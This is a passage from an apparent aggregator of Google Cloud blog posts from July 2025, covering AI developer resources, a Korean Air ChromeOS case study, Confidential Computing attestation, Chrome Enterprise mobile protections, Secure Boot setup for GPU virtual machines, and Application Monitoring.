8. Build a multimodal research agent with LangGraph. An advanced recipe for building a true AI agent that can work in a loop. It uses LangGraph to create a workflow where the agent can search the web, analyze images from the results using Gemini, and synthesize a final answer. Sample code. Blog.

9. Get AI to write good SQL queries (text-to-SQL). Learn state-of-the-art approaches to context building and table retrieval, how to do effective evaluation of text-to-SQL quality with LLM-as-a-judge techniques, the best approaches to LLM prompting and post-processing, and how we approach techniques that allow the system to offer virtually certified correct answers. Guide.

10. Convert standalone ADK/MCP agent into an A2A-compatible component and build an orchestrator to manage such agents. Project source code. Official A2A Python SDK. Official A2A Sample Projects

11. Build a simple multi-agent system using ADK – in this case, a trip planning system. Explore project source code.

12. Build an interactive data anonymizer agent using Google’s ADK. The agent interactively analyzes a table’s schema and data to identify sensitive columns, then proposes and generates a ready-to-run SQL script to create an anonymized and sampled copy. Explore project sample code.

13. Build a strong brand logo with Imagen 3 and Gemini. Learn how you can build your brand style with a logo using Imagen 3, Gemini, and the Python Library Pillow. Sample code.

Fine-tuning, evaluation, and RAG

14. The ultimate best practices guide for Supervised Fine Tuning with Gemini. This guide takes you deeper into how developers can streamline their SFT process, including: selecting the optimal model version, crafting a high quality dataset, and best practices to evaluate the models, including tools to diagnose and overcome problems. Full guide. Gen AI repo.

15. The ultimate guide for getting started with Vertex AI RAG. Bookmark the top concepts for understanding Vertex AI RAG Engine. These concepts are listed in the order of the retrieval-augmented generation (RAG) process. Getting started notebook.

16. Design a production-ready RAG system. A comprehensive architecture guide for understanding the end-to-end role of Vertex AI and Vector Search in a generative AI app. It includes system diagrams, design considerations, and best practices. Official architecture guide.

17. Advanced RAG Techniques: Vertex RAG Engine retrieval quality evaluation and hyperparameters tuning. Learn how to evaluate and perform hyperparameter tuning for retrieval with RAG Engine. Github repo.

18. Fine-tune models using reinforcement learning (RLHF). This tutorial demonstrates how to use reinforcement learning from human feedback (RLHF) on Vertex AI to tune a large-language model (LLM). This workflow uses feedback gathered from humans to improve a model’s accuracy. Colab.

19. Fine-tune video inputs on Vertex AI. If your work involves content moderation, video captioning, and detailed event localization, this guide is for you. Sample notebook.

20. Rapidly compare text prompts and models during development. Use this “Rapid Evaluation” SDK to quickly compare the outputs of different text-based prompts or models side-by-side. Colab.

21. Get feature attributions with Explainable AI. For classification and regression models, know why a model made a certain prediction using Vertex Explainable AI. Documentation.

22. Optimize your RAG retrieval. Step-by-step ways to minimize hallucinations and build trust in AI applications, from root cause analysis to creating a testing framework. Blog.

Integrations

23. Build a multilingual chatbot for mobile. A complete end-to-end guide for building a multilingual chatbot on Android. It combines Gemma, the Gemini API, and MCP to create a powerful, global-ready application. Github repo. Blog.

24. Develop ADK agents that connect to external MCP servers. Use this example of an ADK agent leveraging MCP to access Wikipedia articles, which is a common use case to retrieve external specialised data. We will also introduce Streamable HTTP, the next-generation transport protocol designed to succeed SSE for MCP communications. Guide.

25. Encode text embeddings using the Vertex AI embeddings for text service and the StackOverflow dataset. Vector Search is a fully managed offering, further reducing operational overhead. It’s built upon Approximate Nearest Neighbor (ANN) technology developed by Google Research. Notebook.

26. Integrate MCP with Google Cloud Databases. Learn how to integrate any MCP-compatible AI assistant (including Claude Code, Cursor, Windsurf, Cline, and many more) with Google Cloud Databases. The blog walks you through how to write application code that queries your database, design a schema for a new application, refactor code when the data model changes, generate data for integration testing, etc. Blog.

Stay tuned

And that’s a wrap — for now. Did we miss a game-changing GitHub repo or a codelab that saved you hours of work? Share your favorite resources with us on X.

Read More for the details.

2025 07 22

GCP – How ChromeOS propelled Korean Air’s digital transformation

Tibor Kiss Cloud, Google Cloud gcp

Editor’s note: Today’s post is by Choi HeeJung, Chief Information Officer for Korean Air, one of the world’s top 20 airlines, serving 117 cities across 40 countries on five continents. Renowned for its commitment to excellence and customer satisfaction, Korean Air—named AirlineRating’s 2025 airline of the year—chose ChromeOS to further elevate its exceptional 24/7 global customer service.

“Our move to ChromeOS was about more than just replacing old hardware. It was a strategic step in our journey to remove dependencies on legacy systems like Active Directory and build a more agile, secure, and efficient IT environment.“

Snapshot:

Improved efficiency: Agents have become significantly more productive, saving 5-7 minutes in boot up time with Chromeboxes.
Stronger security and easier IT: Built-in security and centralized management freed up IT time and reduced vulnerabilities.
Future ready and innovative: Agents have been able to utilize Gemini to search for information in Google Drive, get help drafting customer emails and even assist with translating inquiries from different languages.

Over the last ten years, Korean Air has been on a remarkable journey of digital transformation. Our CEO set a clear vision to modernize our infrastructure and empower our employees with the best tools available. This vision led us to deploy a full-scale adoption of Google Workspace, a decision that proved crucial during the COVID-19 pandemic.

Thanks to Google Workspace, our teams could work remotely and collaborate seamlessly, fostering a more open and democratic culture that continues today. But this was just the beginning. Our next big challenge was to modernize our end-user computing, starting with the heart of our customer interactions: the contact center.

Outdated systems in a 24/7 Environment

Our Seoul contact center, the largest of our five global centers, operates nearly 24 hours a day. Our legacy based solution presented significant hurdles. The devices were slow, sometimes taking five to seven minutes to boot up. In a fast-paced environment where every second counts, this was a major drag on productivity. We were also constantly dealing with forced updates and the dreaded “blue screen,” which interrupted operations and frustrated our agents.

From a security standpoint, we were exposed. Because our contact centers operate 24/7, we couldn’t perform necessary updates and security patches as frequently as we needed to. This left us vulnerable to malware and other security threats. Furthermore, the bulky hardware took up valuable desk space, making it difficult for agents who needed multiple monitors to handle increasingly complex customer inquiries. We knew we needed a solution that was secure, efficient, and designed for the modern, cloud-based world we were building.

A seamless transition to ChromeOS

Our move to the cloud and web-based applications made ChromeOS the logical next step. We decided to deploy 670 ASUS Chromeboxes for 700 users in our Seoul contact center. ASUS was able to manufacture a custom Korean keyboard specifically for us and Google, and Megazone, Google’s partner, was able to help us educate agents on ChromeOS native keyboard shortcuts prior to the launch. By providing training and working with our partners, we ensured a smooth transition for our agents.

Thanks to zero-touch enrollment, our ChromeOS devices were ready to use straight out of the box, making deployment effortless for both IT and our agents. The immediate speed was the first thing everyone noticed; the devices boot in seconds, providing an instant start to the workday that became a celebrated advantage. The compact Chromebox design was another huge win, freeing up valuable desk space and enabling the multi-monitor setups essential for effective multitasking. This newfound efficiency empowers our agents to handle more calls per minute, directly boosting customer satisfaction.

For our IT department, the benefits have been just as profound. Managing this fleet is now incredibly efficient. Using the Google Admin console, our small IT team can centrally manage policies and troubleshoot issues with ease. We no longer have to worry about running antivirus software or scheduling downtime for security updates, as security is built into the core of ChromeOS. This has not only improved our security posture but has also led to significant cost savings, and allowed us to redeploy valuable IT resources to strategic projects vs. low value maintenance, like updates.

AI-powered agents and a company-wide vision

With the foundation of ChromeOS firmly in place, we are now focused on the next wave of innovation: AI. We rolled out Google Workspace with Gemini to our second-level agents—the Korean Air staff who handle the most complex customer issues. Our goal is to empower them to serve customers with even greater confidence. With Gemini, they can instantly search for information across Google Drive, get help drafting replies to customer emails, and even assist with translating inquiries from different languages.

Leveraging Amazon Connect, a Chrome Enterprise Recommended partner, we have also redefined our internal quality assurance process. The screen recording application allows us to analyze an agent’s on-screen workflow during customer interactions. This provides insights needed for targeted coaching and process refinement, ensuring we consistently improve our customers’ experience with agents.

The success of our contact center deployment has been so convincing that our leadership has approved a plan to transition the entire company to ChromeOS next year. We are actively working with Google, looking into solutions like Cameyo to ensure that even employees who rely on legacy applications like MS Office or our ERP system have a seamless experience. Our philosophy is not just customer-centric but employee-centric; the user experience is paramount.

Looking back, our move to ChromeOS was about more than just replacing old hardware. It was a strategic step in our journey to remove dependencies on legacy systems like Active Directory and build a more agile, secure, and efficient IT environment. By embracing the cloud and tools from Google, we’re not just keeping pace with change—we’re creating a more innovative and collaborative future for Korean Air.

Thanks to zero-touch enrollment, our ChromeOS devices were ready to use straight out of the box, making deployment effortless for both IT and our agents.

Choi HeeJung

Chief Information Officer, Korean Air

A seamless transition to ChromeOS

AI-powered agents and a company-wide vision

Read More for the details.

2025 07 21

GCP – Innovate with Confidential Computing: Attestation, Live Migration on Google Cloud

Tibor Kiss Cloud, Google Cloud gcp

Since its debut on Google Cloud, Confidential Computing has evolved at an incredible pace, offering customers robust protection for sensitive data processed in the cloud and ensuring higher levels of security and privacy.

Driven by the ever-increasing need to protect sensitive data in the cloud, we’ve innovated continuously, enhancing our services around two key pillars: robust attestation and live migration.

Google Cloud Attestation: Building the foundation of trust

Attestation empowers customers with verifiable assurance of their cloud environment’s integrity, a critical need in today’s security landscape. It confirms that sensitive data is processed in rigorously vetted, hardware-backed Trusted Execution Environments (TEEs), enabling customers to confidently deploy and manage confidential workloads — knowing their data remains protected.

Google Cloud Attestation simplifies this process, offering a unified solution to remotely verify the trustworthiness of Confidential Computing environments, including those secured by Virtual Trusted Platform Module (vTPM) for AMD SEV and TDX Module for Intel Trust Domain Extensions (TDX). This provides customers with the necessary tools to help meet stringent compliance requirements and protect their most valuable data.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e85007bf280>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Attestation in action: Building confidence, layer by layer

Google Cloud Attestation doesn’t just take hardware vendors at their word. We work directly with them and apply our own stringent security standards. This rigorous process allows you to verify:

Genuine hardware: Your confidential workloads are running on authentic, untampered hardware.
Uncompromised environment: The TEE hasn’t been modified or compromised in any unauthorized way.
Strict security standards: Data processing within the TEE adheres to the highest security protocols.

This verification is made accessible through APIs, providing “claims tokens” that represent the attestation proof. Here’s a breakdown of the process:

Gather evidence: Google Cloud Attestation gathers evidence from your confidential environment.
Evaluate: This evidence is evaluated against endorsed values and Google’s internal security policies.
Generate claims: The results are converted into verifiable claims, formatted according to the IETF RATS EAT standard.
Sign cryptographically: Google Cloud Attestation provides cryptographically signed claims, ensuring their trustworthiness for services like secret release servers and identity and access management (IAM).

Google Cloud Attestation verifier service.

These cryptographic proofs can be validated in two ways, offering flexibility and enhanced privacy:

Using a public key: Validate by checking the well-known endpoint and using the public key from the jwks_uri field. This works with OpenID Connect (OIDC) compatible applications.
Using a root certificate: Download the root certificate from the attestation-pki-root well-known endpoint (over HTTPS) and use it to validate the certificate chain. This option (using tokenType: "PKI") enhances privacy by removing the possibility of the Attestation Verifier owner to collect IP address data, and also enables offline validation. A practical example of offline validation can be found in our PKI codelab.

Broad support, growing interoperability

Currently, Google Cloud Attestation supports:

Confidential VMs: Compute Engine VMs with hardware-based memory encryption.
Confidential GKE: Kubernetes nodes built on top of Confidential VMs, extending encryption-in-use to your containerized workloads.
Confidential Space: An isolated environment for operating on sensitive data, where data owners retain confidentiality. The workload runs on a hardened OS based on Container-Optimized OS.

The Attestation result, in the form of OpenID Connect tokens, is designed for interoperability. This means it can be used with cloud IAMs beyond Google Cloud IAM. For instance, a Confidential Space workload can present the Attestation Result to AWS Identity and Access Management, enabling secure multi-party collaboration where data or keys may reside in AWS.

“Attestation is an essential component of Confidential Computing and helps assure the integrity of the workload,” said Olivier Richaud, vice-president, Platforms and Site Reliability Engineering, Symphony. “With remote attestation we can prove to our end-customers that their data is processed inside of a Trusted Execution Environment where even we cannot access customer’s data.”

You can learn more about Google Cloud Attestation here.

Operator-independent attestation

Customers in highly-regulated industries including healthcare and Web3 may require third-party attestation that meets the “separation of duties” and Zero Trust requirements for the infrastructure provider and attestation provider.

For those customers, we added third-party verifier support with the Intel Tiber Trust Authority (ITA) to further the separation of duties. This latest collaboration between Intel and Google Cloud provides additional flexibility and strengthens trust across different security architectures.

Intel Tiber Trust Authority support is available for Intel TDX based Confidential VMs and Confidential Space running on the C3 machine family. We are also very excited to announce that ITA is a free service (with optional paid support) for Confidential Computing customers on Google Cloud.

“Intel is delighted to have partnered with Google Cloud to offer operator independent attestation through Intel Tiber Trust Authority for Google’s Confidential VMs and Confidential Space. This partnership aims to accelerate the broad adoption and scalability of Confidential Computing,” said Anand Pashupathy, vice-president and general manager, Intel Confidential Computing.

Smooth operations: Live migration for Confidential GKE nodes

While robust security is paramount, it shouldn’t come at the cost of operational efficiency. That’s why we’re thrilled to share the general availability of Live Migration for Confidential GKE Nodes using AMD SEV Confidential Computing technology running on N2D machines.

Traditionally, updating infrastructure with underlying privacy protections in place could be a disruptive process. Live Migration changes that. It enables the transfer of running workloads to different host machines — without service interruption.

How Live Migration works with Confidential Computing

Live Migration for Confidential GKE Nodes differs slightly from regular GKE node migrations. The key difference is the continuous encryption of memory pages during the transfer between the source and destination hosts. This is achieved through the hardware capabilities of AMD EPYC Milan processors.

While the hardware protects the memory, our cloud infrastructure coordinates the maintenance event transparently to your workload. Any existing AMD-SEV based Confidential GKE node cluster (on N2D machine family), once upgraded to a supported GKE version, will automatically have Live Migration enabled.

To begin using Confidential GKE Nodes with Live Migration, simply create your new Confidential GKE Nodes. Live Migration is enabled by default. Confidential VMs also support Live Migration.

The future of Confidential Computing

Google Cloud is committed to pushing the boundaries of Confidential Computing. By combining robust attestation with live migration, we’re empowering customers to protect their most sensitive data while maintaining operational agility.

To further highlight our commitment to security, today we are releasing the latest testing results for Confidential Space from NCC Group, an independent security assessment organization. It covers the latest improvements achieved by using Intel TDX, Intel Tiber Trust Authority, and a third-party key management and identity and access management system.

You can learn more about how you can use Confidential Computing here.

Read More for the details.

2025 07 21

GCP – Graduating the inaugural Google for Startups Accelerator: AI First cohort in the UK

Tibor Kiss Cloud, Google Cloud gcp

The Google for Startups Accelerator: AI First UK has celebrated the graduation of its latest cohort of AI startups. The 12-week hybrid program, designed for rapid growth, began in London in April and concluded with a Demo Day and Graduation in July. Founders received mentorship from Google experts, technical support for AI technologies, and extensive networking opportunities with investors, partners, and other entrepreneurs.

“The Program Kick-Off Week really made me re-consider some aspects that we now take for granted. I also have a TON of inspiration for future LLM/agent/multi-agent concepts that we will experiment with.” – Paul Symmers, CTO at Building Atlas.

Through the hands-on support provided during the program, DataWhisper, an agentic payment platform, was able to fully integrate Google Cloud and AI technologies, including Gemini, Vertex, and Model Garden, making Gemini the default model for their platform.

“The Program helped incredibly by opening doors to contacts with major partners, leading to increased company valuation and closing a commercial deal during the program. Google is at the heart of my strategy for 2025-2026.” – Luis Lancos, CEO at Datawhisper.

At the Demo Day event, held on July 11th, in partnership with HSBC Innovation Banking and London & Partners, the cohort celebrated its achievements. The event connected 15 high-potential UK startups with over 100 of the UK’s tech experts, VCs, and corporates. These startups showcased innovative AI solutions, from cancer detection to smarter supply chains, seeking partnerships and contributing to responsible AI innovation. Keynotes were delivered by Jeanine Banks, VP of Google Developer X, Laura Citron, CEO of London & Partners and Ryan Clements, VP Early Stage Banking at HSBC Innovation.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e8508286070>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Learn more about the graduating startups and their inspiring work:

Bindbridge (London) is a generative AI platform that discovers and designs molecular glues for targeted protein degradation in plants.
Building Atlas (Edinburgh) uses data and AI to support the decarbonisation of non-domestic buildings by modelling the best retrofit plans for any portfolio size.
Comply Stream (London) helps to streamline financial crime compliance operations for businesses and consumers.
Datawhisper (London) provides safe and compliant AI Agentic solutions tailored for the fintech and payments industry.
Deducta (London) is a data intelligence platform that supports global procurement teams with supply chain insights and efficiencies.
Dysplasia Diagnostics (London) develops AI-based, non-invasive, and affordable solutions for early cancer detection and treatment monitoring.
Flow.bio (London) is an end-to-end cloud platform for running large sequencing pipelines and auto-structuring bio-data for machine learning workflows.
Humble (London) enables non-technical users to build and share AI-powered apps and workflows, allowing them to automate without writing code.
Immersive Fox (London) is an AI studio for creating presenter-led marketing and communication videos directly from text.
Kestrix (London) uses thermal drones and advanced software to map and quantify heat loss from buildings and generate retrofit plans.
Loc.AI (Cardiff) provides the foundational operating system for truly resilient, distributed intelligence that runs without a single point of failure.
Measmerize (Birmingham) provides sizing advice for fashion e-commerce retailers, enabling brands to increase sales and decrease return rates.
PSi (London) uses AI to host large-scale online deliberations, enabling local governments to harness collective intelligence for effective policymaking.
Shareback (London) is an AI platform that allows employees to securely interact with GPT-based assistants trained on company, department, or project-specific data.
Source.dev (London) simplifies the software development lifecycle for smart devices, to help accelerate innovation and streamline software updates.

Learn more about Google for Startups Accelerator programs on startup.google.com. You can also register your interest for future programs if you are a Seed to Series A stage tech startup, building innovative and highly technical AI-first solutions.

Read More for the details.

2025 07 21

GCP – Chrome brings personal and work separation to iOS users and more enterprise protections to mobile

Tibor Kiss Cloud, Google Cloud gcp

Many organizations are embracing bring your own device models, meaning employees may be accessing resources from their browsers on unmanaged computers or phones. Chrome Enterprise already gives employees and organizations a secure and helpful way to manage users at the browser level and keep work and personal information separate, and many businesses take advantage of the Android work and personal profile capabilities.

Give iOS users the flexibility to easily switch between work and personal accounts, knowing an organization can securely manage its environment with transparency and security protections. Whether enterprises have a BYOD model or are looking for more ways to better secure their corporate-owned phones and tablets, Chrome Enterprise is bringing tighter enterprise browsing protections to mobile.

Many of us use our mobile devices for both work and personal tasks, often juggling multiple Google Accounts. This can mean constantly signing in and out. Chrome is now offering support for managed account browsing that creates strict data separation from other browsing and seamless switching between accounts. This change means businesses can empower users to use their device of choice, enabling secure access to corporate resources and keeping company data protected. Local data and content like tabs and history stay within the managed account browsing experience.

The first time users sign in or switch to a managed account, an onboarding screen provides transparency about the separation of managed account data and how their organization is handling their data. Organizations maintain control, with the ability to decide how existing browsing data is handled when a user initially signs in or switches to a managed account. When users browse in their managed account, they are notified they are entering a managed experience through an on-screen confirmation.

Advanced browser data protections and secure access on mobile devices

Once an employee is signed into a corporate account on either Android or iOS, Chrome Enterprise offers a variety of advanced security capabilities that IT teams can enforce. These capabilities are designed to block unauthorized access to corporate apps and data, while protecting against data exfiltration.

Organizations can now enforce context-aware access for managed accounts on Chrome on both Android and iOS. Enterprises can limit access to critical apps, ensuring that users are logging into a managed instance of Chrome to access corporate resources. For example, if an employee received a corporate link through Gmail on their mobile device, IT teams can require them to sign into their managed account in Chrome on iOS or Android before visiting the link or browser app.

Additionally, Chrome Enterprise’s reporting capabilities are now extending to both Android and iOS.This gives organizations the ability to send critical data related to security events to the security investigation tool in the Google Admin console, Chrome logs, or the SIEM of their choice. This provides an additional view of risks that includes browser activity across mobile devices, enabling IT teams to make more informed decisions about their overall security posture.

To help limit users from visiting unapproved or unsanctioned sites, URL filtering has been a valuable capability for desktop and Android environments. For example, organizations can block employees from visiting certain GenAI sites at a category level, redirecting them to the approved corporate services. URL filtering is now available in Chrome on iOS, offering further control to IT teams.

Whether organizations are looking to invest more in productivity on mobile devices, or if they are looking to further reduce risks of data loss across all endpoints, Chrome Enterprise Premium offers a growing number of protections across operating systems and platforms. Enterprises can get started with reporting using Chrome Enterprise Core at no additional cost, and talk to an expert about adding advanced threat and data protections with Chrome Enterprise Premium.

Read More for the details.

2025 07 21

GCP – The Future is Collaborative: ChromeOS Customer Community

Tibor Kiss Cloud, Google Cloud gcp

We’re excited to announce a new online platform for the ChromeOS Customer Community: it’s now a global, open platform accessible to our business customers. This community is designed for IT admins and professionals, along with business leaders and decision-makers, who use and deploy ChromeOS in their organizations, regardless of size. This expansion, directly inspired by ChromeOS admins’ feedback, reinforces our commitment to building a more interconnected ecosystem. By removing geographical barriers, the community will offer unparalleled opportunities for IT admins and professionals to connect, collaborate, share insights, and grow, no matter where they are.

NewCuteBlogCommunity (1) — Please note that the platform will initially be available in English only.

Direct access to expertise and resources

This global community is your central hub for official announcements, proven best practices, and helpful troubleshooting tips. Navigate topics and resources freely, and by registering with your Google Account, under our team’s moderation you can post questions and reply to fellow users. Carefully tailored by ChromeOS specialists and product experts, you’ll gain access to valuable resources to help you maximize the use of ChromeOS in your business. In addition, you’ll find a calendar of online events designed for our customers. Most importantly, this community offers a direct channel for anticipated product development information and updates, delivering a true understanding of everything ChromeOS can do for your organization.

Connecting and collaborating through peer-to-peer learning

This platform has the intention to connect global business leaders who utilize ChromeOS, creating a space where sharing experiences and solving challenges together is easier than ever. Members can learn from each other’s successful approaches, share effective practices, and collaborate on answering questions from their peers. Beyond problem-solving, the community can inspire new ways to use ChromeOS, driven by real-world examples and from use cases spanning healthcare, retail and finance; to name just a few. Join the conversation, ask questions, and show off your expertise to land on our contributor leaderboard! Plus, you’ll be able to showcase your ChromeOS Admin Professional Certified Admin badge alongside your profile.

Tailored for growth: How our community supports SMBs

For small and medium businesses, navigating device management can often feel like a solo mission, especially when IT resources are limited. This is why this platform was designed for you to easily find answers to common questions, troubleshooting issues, and learning best practices from our user guides or fellow Admins. Additionally, if you’re new to ChromeOS, you’ll find our Getting Started guides to support your onboarding and helping your users. This platform will continue to develop and evolve with small businesses in mind, so whether you’re just starting with ChromeOS or scaling an existing deployment, you’ll be able to access tailored advice and peer support to help your organization thrive.

A Unified Vision: Synergies with the Android Enterprise Community

The ChromeOS Customer Community is launching alongside the Android Enterprise Customer Community, recognizing the inherent synergies between these two products. While maintaining its distinct identity, this co-location offers significant value to customers invested in both ChromeOS and Android Enterprise. By providing a unified and streamlined experience, businesses can more easily manage their diverse ecosystems, access relevant information, and find support across both platforms.

We’re excited to see how this expanded community will empower our ChromeOS business customers. What are you most looking forward to gaining from this global platform? Join the Community today and let us know!

Read More for the details.

2025 07 18

GCP – How to enable Secure Boot for your AI workloads

Tibor Kiss Cloud, Google Cloud gcp

As organizations race to deploy powerful GPU-accelerated workloads, they might overlook a foundational step: ensuring the integrity of the system from the very moment it turns on.

Threat actors, however, have not overlooked this. They increasingly target the boot process with sophisticated malware like bootkits, which seize control before any traditional security software can load and grant them the highest level of privilege to steal data or corrupt your most valuable AI models.

Why it matters: The most foundational security measure for any server is verifying its integrity the moment it powers on. This process, known as Secure Boot, is designed to stop deep-level malware that can hijack a system before its primary defenses are even awake.

Secure Boot is part of Google Cloud’s Shielded VM offering, which allows you to verify the integrity of your Compute VM instances, including the VMs that handle your AI workloads. It’s the only major cloud offering of its kind that can track changes beyond initial boot out of the box and without requiring the use of separate tools or event-driven rules.

The bottom line: Organizations don’t have to sacrifice security for performance. There is a clear, repeatable process to sign your own GPU drivers, allowing you to lock down your infrastructure’s foundation without compromising your AI workloads.

Our Secure Boot capability can be opted into at no additional charge, and now there’s a new, easier way to set it up for your GPU-accelerated machines.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e333e1f3430>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Understanding the danger of bootkits

It’s important to secure your systems from boot-level threats. Bootkits target the boot process, the foundation of an operating system. By compromising the bootloader and other early-stage system components, a bootkit can gain kernel-level control before the operating system and its security measures load. Malware can then operate with the highest privileges, bypassing traditional security software.

This technique falls under the Persistence and Defense Evasion tactics in the MITRE ATT&CK framework. Bootkits are difficult to detect and remove due to their low-level operation. They hide by intercepting system calls and manipulating data, persisting across reboots, stealing data, installing malware, and disabling security features.

Bootkits and rootkits pose a persistent, embedded threat, and have been observed as part of current threat actor trends from Google Threat Intelligence Group, the European Union Agency for Cybersecurity (ENISA), and the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Google Cloud always works on improving the security of our solutions by strengthening our products and providing tools you can use yourself. In this article, we would like to demonstrate a new, easier way of setting up Secure Boot for your GPU-accelerated machines.

Limitations of Secure Boot with GPUs

Shielded VMs employ a TPM 2.0-compliant virtual Trusted Platform Module (vTPM) as their root of trust, protected by Google Cloud’s virtualization and isolation powered by Titan chips. While Secure Boot enforces signed software execution, Measured Boot logs boot component measurements to the vTPM for remote attestation and integrity verification.

Limitations start when you want to use a kernel module that is not part of the official distribution of your operating system. That is especially problematic for AI workloads, which rely on GPUs whose drivers are usually not part of official distributions. If you want to manually install GPU drivers on a system with Secure Boot, the system will refuse to use them because they won’t be properly signed.

How to use Secure Boot on GPU-accelerated machines

There are two ways you can tell Google Cloud to trust your signature when it confirms the GPU driver validity with Secure Boot: with an automated script, or manually.

The script that can help you prepare a Secure Boot compatible image is open-source and is available in our GitHub repository. Here’s how you can use it:

code_block: <ListValue: [StructValue([(‘code’, ‘# Download the newest version of the script:rncurl -L https://storage.googleapis.com/compute-gpu-installation-us/installer/latest/cuda_installer.pyz –output cuda_installer.pyzrnrn# Make sure you are logged in with gcloudrngcloud auth loginrnrn# Check available option for the build processrnpython3 cuda_installer.pyz build_image –helprnrn# Use the script to build an image based on Ubuntu 24.04rnPROJECT = your_project_namernZONE = zone_you_want_to_usernSECURE_BOOT_IMAGE = name_of_the_final_imagernrnpython3 cuda_installer.pyz build_image –project $PROJECT –vm-zone $ZONE –base-image ubuntu-24 $SECURE_BOOT_IMAGE’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e333e1f30a0>)])]>

The script will execute each of the five steps described below for you. It may take up to 30 minutes, as the installation process takes this much time. We’ve also detailed how to use the building script in our documentation.

To manually tell Google Cloud to trust your signature, follow these five steps (also available in our documentation):

Generate your own certificate to be used for signing the driver.
Create a fresh VM with the OS of your choice (Secure Boot disabled, GPU not required).
Install and sign the GPU driver (and optionally CUDA toolkit).
Create a new Disk Image based on the machine with a self-signed driver, adding your certificate to the list of trusted certificates.
The new image can be now used with Secure Boot enabled VMs.

Whether you used the script or performed the task manually, you’ll want to verify that the process worked.

Start a new GPU accelerated VM using the created image

To verify that everything worked, we can create a new VM using the new disk image with the following command (we enable the Secure Boot option to verify that our process worked).

code_block: <ListValue: [StructValue([(‘code’, ‘# Create a new VM with T4 GPU to verify that everything works. Note that here ZONE needs to have T4 GPUs available.rnTEST_INSTANCE_NAME = name_of_the_test_instancernrngcloud compute instances create $TEST_INSTANCE_NAME \rn–project=$PROJECT \rn–zone=$ZONE \rn–machine-type=n1-standard-4 \rn–accelerator=count=1,type=nvidia-tesla-t4 \rn–create-disk=auto-delete=yes,boot=yes,device-name=$TEST_INSTANCE_NAME,image=projects/$PROJECT/global/images/$SECURE_BOOT_IMAGE,mode=rw,size=100,type=pd-balanced \rn–shielded-secure-boot \rn–shielded-vtpm \rn–shielded-integrity-monitoring \rn–maintenance-policy=TERMINATErnrn# gcloud compute ssh to run nvidia-smi and see the outputrngcloud compute ssh –project=$PROJECT –zone=$ZONE $TEST_INSTANCE_NAME –command “nvidia-smi”rnrn# If you decided to also install CUDA, you can verify it with the following commandrngcloud compute ssh –project=$PROJECT –zone=$ZONE $TEST_INSTANCE_NAME –command “python3 cuda_installer.pyz verify_cuda”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3338282af0>)])]>

Clean up

When you verify that the new image works, there’s no need to keep the verification VM around. You can delete it with:

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud compute instances delete –zone=$ZONE –project=$PROJECT $TEST_INSTANCE_NAME’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3338282130>)])]>

Enabling Secure Boot

Now that you have built a Secure Boot compatible base image for your GPU-based workloads, remember to actually enable Secure Boot on your VM instances when you use those images! Secure Boot is disabled by default, so it needs to be explicitly enabled for Compute Engine instances.

When creating new instances

If you create a new instance using Cloud Console, the checkbox to enable Secure Boot can be found in the Security tab of the creation page, under the Shielded VM section.

For the gcloud enthusiasts, there’s –shielded-secure-boot flag available for the gcloud compute instances create command.

Updating existing instances

You can also enable Secure Boot for instances that already exist, however, make sure that they are running a compatible system. If the driver installed on those machines is not signed with a properly configured key, the driver will not be loaded. To update Secure Boot configuration for existing VMs, you’ll have to follow the stop, update and restart procedure, as described in this documentation page.

Get started

Make sure to visit our documentation page to learn more about the process and follow our GitHub repository to stay up to date with other GPU automation news.

Read More for the details.

2025 07 18

GCP – Application monitoring in Google Cloud: Bridging manual and AI-assisted troubleshooting

Tibor Kiss Cloud, Google Cloud gcp

As developers and operators, you know that having access to the right information in the proper context is crucial for effective troubleshooting. This is why organizations invest a lot upfront curating monitoring resources across different business units: so information is easy to find and contextualize when needed.

Today we are reducing the need for this upfront investment with an out-of-the-box Application Monitoring experience for your organization on Google Cloud within Cloud Observability.

Application Monitoring consists of a set of pre-curated dashboards with relevant metrics and logs mapped to a user-defined application in App Hub. It incorporates best practices pioneered by Google Site Reliability Engineers (SRE) to optimize manual troubleshooting and unlock AI-assisted troubleshooting.

Application Monitoring automatically labels and brings together key telemetry for your application into a centralized experience, making it easy to discover, filter and correlate trends. It also feeds application context into Gemini Cloud Assist Investigations, for AI-assisted troubleshooting.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e333dc4f3d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

1. Application, service and workload dashboards

No more spending hours configuring application dashboards.

From the moment you describe your application in App Hub, Application Monitoring starts to automatically build dashboards tailored to your environment. Each dashboard comprises relevant telemetry for your application and is searchable, filterable and ready for deep dives — no configuration required.

The dashboards offer an overview of charts detailing the SRE Four Golden Signals: traffic, latency, error rate, and saturation. This provides a high-level view of application performance, integrating automatically collected system metrics across various services and workloads such as load balancers, Cloud Run, GKE workloads, MIGs, and databases. From this overview, you can then drill down into services or workloads with performance issues or active alerts to access detailed metrics and logs.

For example in the image below, a user defined an App Hub application called Cymbal BnB app, with multiple services and workloads. The flow below shows the automatically generated experience with golden signals, alerts and relevant logs.

Figure 1 – A user’s flow from an App Hub defined application (i.e. Cymbal BnB) to the automatic prebuilt Application Monitoring experience in Cloud Observability

2. Labels and context propagation

See application labels propagated seamlessly across Google Cloud

Once Application Monitoring is enabled, your application labels are propagated across Google Cloud, so you can see and use them to filter and focus on the most essential signals across the logs, metrics and trace explorers.

Figure 2 – Logs Explorer showing application automatically tagged with application labels

